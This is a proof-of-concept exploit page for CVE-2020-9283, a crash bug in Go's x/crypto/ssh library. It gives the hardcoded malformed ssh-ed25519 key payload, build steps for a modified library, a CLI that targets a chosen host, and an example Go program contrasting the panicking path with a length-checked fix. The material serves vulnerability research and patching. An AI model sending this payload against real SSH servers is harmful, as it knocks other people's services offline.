
CVE-2020-9283 PoC — Golang Go crypto data forgery vulnerability

Source
Associated Vulnerability
Title: Golang Go crypto data forgery vulnerability (CVE-2020-9283)
Description: golang.org/x/crypto before v0.0.0-20200220183623-bac4c82f6975 for Go allows a panic during signature verification in the golang.org/x/crypto/ssh package. A client can attack an SSH server that accepts public keys. Also, a server can attack any SSH client.
Description
Exploit for CVE-2020-9283 based on Go 
Readme
# Exploit for CVE-2020-9283  

This project is inspired by the original PoC found at github.com/mark-adams/exploits/CVE-2020-9283.
I was curious how the Go SSH library was implemented, so I decided to implement the PoC in Go.

A short writeup can be found here https://dev.to/brompwnie/modifying-go-s-crypto-ssh-library-for-cve-2020-9283-26a7

# What does this do?

This sends a public-key authentication request carrying an ssh-ed25519 key blob whose key field has the wrong length. A Go SSH server built on an unpatched golang.org/x/crypto/ssh hands that key to ed25519.Verify without checking its size, and ed25519.Verify panics on a key that is not 32 bytes. Unless the server recovers from panics, the process dies, so this is a denial of service.

# Installation

I've released binaries in the Release section; however, you can rebuild your own using the source code attached.

## Building the sources
I decided to modify the Go crypto library directly on my system to understand how it works. This is not ideal and probably not the best way to do it, but it works ;) If you want to rebuild using Go modules, replace the contents of the golang.org/x/crypto/ssh files client_auth.go, handshake.go and transport.go on your local system with the ".bak" files located here. These modified files contain verbose debugging output and a hardcoded payload of "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161", which triggers the panic. Decoded, that hex is an SSH public-key blob in RFC 4251 wire format: a length-prefixed string "ssh-ed25519" (0x0000000b, 11 bytes) followed by a length-prefixed key field of 21 bytes (0x00000015, the ASCII "aaa-aaaa-aa-aaa-aaaaa"). A valid Ed25519 public key is 32 bytes; the unpatched library never checks the length and passes the short key straight to ed25519.Verify, which panics.
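The failure mode described above, alongside the length check that the fix adds, as an added example in Go. This is not the PoC's own code and not the x/crypto library code: it parses the README's hardcoded payload with a minimal RFC 4251 string reader, shows that handing the resulting 21-byte key to the standard library's ed25519.Verify panics with the message quoted in the Usage section, and shows a hardened verify returning an error instead. The function names (readString, writeString, parseBlob, verifyUnchecked, verifyChecked, roundTripValidKey) and the signed message bytes are this example's own. The round trip with a freshly generated key goes beyond the PoC to show that the check still admits genuine keys.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"encoding/binary"
	"encoding/hex"
	"errors"
	"fmt"
)

// Payload hardcoded in the PoC (copied from the README): an SSH public-key
// blob whose Ed25519 key field is 21 bytes, not the required 32.
const payloadHex = "0000000b7373682d65643235353139000000156161612d616161612d61612d6161612d6161616161"

// readString consumes one RFC 4251 "string" (uint32 big-endian length + bytes).
func readString(in []byte) (s, rest []byte, err error) {
	if len(in) < 4 {
		return nil, nil, errors.New("ssh: short string length")
	}
	n := binary.BigEndian.Uint32(in)
	in = in[4:]
	if uint64(n) > uint64(len(in)) {
		return nil, nil, errors.New("ssh: string length exceeds buffer")
	}
	return in[:n], in[n:], nil
}

// writeString appends one RFC 4251 "string" to buf.
func writeString(buf, s []byte) []byte {
	var l [4]byte
	binary.BigEndian.PutUint32(l[:], uint32(len(s)))
	return append(append(buf, l[:]...), s...)
}

// parseBlob splits a public-key blob into its algorithm name and raw key
// bytes with no length check on the key, the shape of the pre-fix parser.
func parseBlob(blob []byte) (algo string, key []byte, err error) {
	name, rest, err := readString(blob)
	if err != nil {
		return "", nil, err
	}
	key, rest, err = readString(rest)
	if err != nil {
		return "", nil, err
	}
	if len(rest) != 0 {
		return "", nil, errors.New("ssh: trailing bytes after key")
	}
	return string(name), key, nil
}

// verifyUnchecked hands the key straight to ed25519.Verify, which panics on
// any key that is not ed25519.PublicKeySize bytes. The panic is recovered
// here only so it can be reported; the vulnerable server had no recovery.
func verifyUnchecked(key, msg, sig []byte) (ok bool, panicMsg string) {
	defer func() {
		if r := recover(); r != nil {
			panicMsg = fmt.Sprint(r)
		}
	}()
	return ed25519.Verify(ed25519.PublicKey(key), msg, sig), ""
}

// verifyChecked is the hardened form: validate lengths first, so a malformed
// key yields an error to the caller instead of a process-killing panic.
func verifyChecked(key, msg, sig []byte) error {
	if l := len(key); l != ed25519.PublicKeySize {
		return fmt.Errorf("ssh: invalid size %d for Ed25519 public key", l)
	}
	if l := len(sig); l != ed25519.SignatureSize {
		return fmt.Errorf("ssh: invalid size %d for Ed25519 signature", l)
	}
	if !ed25519.Verify(ed25519.PublicKey(key), msg, sig) {
		return errors.New("ssh: signature did not verify")
	}
	return nil
}

// roundTripValidKey shows the same parser and check accepting a genuine key:
// generate, sign, encode as a blob, parse, verify.
func roundTripValidKey(msg []byte) error {
	pub, priv, err := ed25519.GenerateKey(rand.Reader)
	if err != nil {
		return err
	}
	blob := writeString(writeString(nil, []byte("ssh-ed25519")), pub)
	algo, key, err := parseBlob(blob)
	if err != nil {
		return err
	}
	if algo != "ssh-ed25519" {
		return fmt.Errorf("unexpected algorithm %q", algo)
	}
	return verifyChecked(key, msg, ed25519.Sign(priv, msg))
}

func main() {
	blob, _ := hex.DecodeString(payloadHex)
	algo, key, err := parseBlob(blob)
	fmt.Printf("algo=%s keylen=%d err=%v\n", algo, len(key), err)
	msg := []byte("constructed data-to-be-signed") // stands in for the real signed auth data
	sig := make([]byte, ed25519.SignatureSize)      // any 64-byte blob; the key check fires first
	_, p := verifyUnchecked(key, msg, sig)
	fmt.Println("vulnerable path panicked with:", p)
	fmt.Println("hardened path returned:", verifyChecked(key, msg, sig))
	fmt.Println("valid key round trip:", roundTripValidKey(msg))
}
```

Run it with `go run`. In the library itself the unchecked call sits in the server's publickey authentication handling, where pubKey.Verify runs on whatever key blob the client supplied before the result of the key-acceptance callback is consulted, which is why a server only has to accept public keys in general, not this key, to be crashed; the fixed library rejects an ssh-ed25519 blob with a wrong-length key at parse time and again before calling ed25519.Verify.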

# Usage
You will see lots of debugging output and "errors"; this is expected. If your target has panicked, you should see errors mentioning "bad public key length". If you want to test this locally, use the vulnerable code that can be found at github.com/mark-adams/exploits/CVE-2020-9283

```
# ./CVE-2020-9283 -h
Usage of ./CVE-2020-9283:
  -host string
        IP address of SSH host to target (default "localhost")
  -key string
        ssh-ed25519 private key to use (default "thekey")
  -port string
        Port to target (default "22")

# ./CVE-2020-9283 -port=2022
[+] Sploit for CVE-2020-9283
[+] Attempting to pwn: localhost:2022
[!] Attempting: cMSG_USERAUTH_REQUEST
[+] userAuthRequestMsg User:  notme
[+] userAuthRequestMsg Service:  ssh-connection
[ERROR] ssh: handshake failed: EOF
[+] This should have invoked a panic on the SSH target i.e 'panic: ed25519: bad public key length'

```
File Snapshot

```
[4.0K] /data/pocs/0a3142ae02d3b8a652d8b087e9e865f96738d61b
├── [ 20K] client_auth.go.bak
├── [8.7K] client.go.bak
├── [ 115] go.mod
├── [ 824] go.sum
├── [ 16K] handshake.go.bak
├── [1.7K] main.go
├── [1.5K] Makefile
├── [2.0K] README.md
└── [9.3K] transport.go.bak

0 directories, 9 files
```